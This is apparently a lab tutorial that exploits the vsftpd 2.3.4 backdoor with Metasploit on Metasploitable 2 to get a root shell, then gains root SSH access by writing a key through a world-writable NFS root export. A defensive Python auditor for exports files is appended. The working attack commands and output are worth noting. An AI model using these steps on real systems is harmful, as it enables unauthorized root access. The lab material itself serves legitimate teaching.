The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. This virtual machine is compatible with VMware, VirtualBox, and other common virtualization platforms.
We have installed 'Metasploitable 2' and Kali Linux as virtual machines in KVM on CentOS 7. For instructions on how to install the Metasploitable 2 virtual machine in KVM, refer to this post.
In a previous post, we carried out a vulnerability scan of the 'Metasploitable 2' virtual machine using OpenVAS in Kali Linux.
The scan found the following vulnerability in 'vsftpd'.
vsftpd Compromised Source Packages Backdoor Vulnerability
In this tutorial, we will exploit this vulnerability using Metasploit and get 'root' access on the machine.
1) Start Metasploit.
root@kali:~# msfconsole
2) Search for the vsftpd vulnerability
msf > search vsftpd
[!] Database not connected or cache not built, using slow search
Matching Modules
================
Name                                  Disclosure Date  Rank       Description
----                                  ---------------  ----       -----------
exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution
3) Select the exploit module
msf > use exploit/unix/ftp/vsftpd_234_backdoor
4) Set the IP address of the 'victim' machine
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.122.73
RHOST => 192.168.122.73
5) Exploit the vulnerability and get root access.
msf exploit(vsftpd_234_backdoor) > exploit
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.122.115:42588 -> 192.168.122.73:6200) at 2015-05-27 14:29:55 +0530
id
uid=0(root) gid=0(root)
After an attacker has gained 'root' access, he will typically install a rootkit so that he can come and go at will and hide his activities from the administrator. The rootkit will attempt to remove all traces of the attacker's presence from the log files and replace binaries such as ls, ps, ifconfig, killall, netstat, lsof and passwd. In a future tutorial, we will see how to use 'tripwire' and 'chkrootkit' to detect rootkits.
Attack NFS and get root login
During the vulnerability scan of the 'Metasploitable 2' virtual machine in a previous post, we found the following misconfiguration in the NFS server: the root file system is exported in read/write mode.
root@kali:~# showmount -e 192.168.122.73
Export list for 192.168.122.73:
/ *
Getting access to a system with a writeable filesystem like this is trivial. To do so (and because SSH is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account's authorized_keys file:
root@kali:~# mount -o nolock 192.168.122.73:/ /mnt
root@kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
root@kali:~# cat .ssh/id_rsa.pub >> /mnt/root/.ssh/authorized_keys
root@kali:~# umount /mnt
root@kali:~# ssh 192.168.122.73
Last login: Mon May 25 07:46:57 2015 from :0.0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
root@metasploitable:~#
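A defender's check for the NFS misconfiguration used in this section, as an added example that is not part of the original post: it parses exports(5)-style text and flags exports of the root filesystem, read/write exports open to any host, and no_root_squash (which lets root on a client act as uid 0 on the export). The sample file, host names, function names and finding labels are constructed for illustration; the parser assumes one export per line and does not handle line continuations or "-options" default entries.

```python
import re

# Constructed sample in exports(5) syntax; the first line models the kind of
# export the walkthrough abuses (root filesystem, any client, read/write).
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/            *(rw,sync,no_root_squash,no_subtree_check)
/srv/share   192.168.122.0/24(ro,sync) *(rw,sync)
/srv/backup  backup01.example.internal(rw,sync,root_squash)
"""

# One whitespace-separated entry: optional client, optional "(opt,opt,...)".
ENTRY = re.compile(r"(?P<client>[^\s()]*)(?:\((?P<opts>[^)]*)\))?")

def is_world(client):
    """True when the client spec matches every host."""
    return client == "*" or client.endswith("/0")

def audit_exports(text):
    """Return (path, client, finding) tuples for risky export entries."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs or [""]:               # no client listed = every host
            m = ENTRY.fullmatch(spec)
            if m is None:
                continue
            client = m.group("client") or "*"    # "(rw)" alone also means every host
            opts = set((m.group("opts") or "").split(","))
            if path == "/":
                findings.append((path, client, "root-filesystem-exported"))
            if "rw" in opts and is_world(client):    # exports(5) default is ro
                findings.append((path, client, "world-writable"))
            if "no_root_squash" in opts:             # default is root_squash
                findings.append((path, client, "no_root_squash"))
    return findings

if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(*finding)
```

Because entries are split on whitespace, the classic mistake `host1 (rw)` (a space before the parenthesis) is reported as a read/write export to every host, which is how the NFS server interprets it.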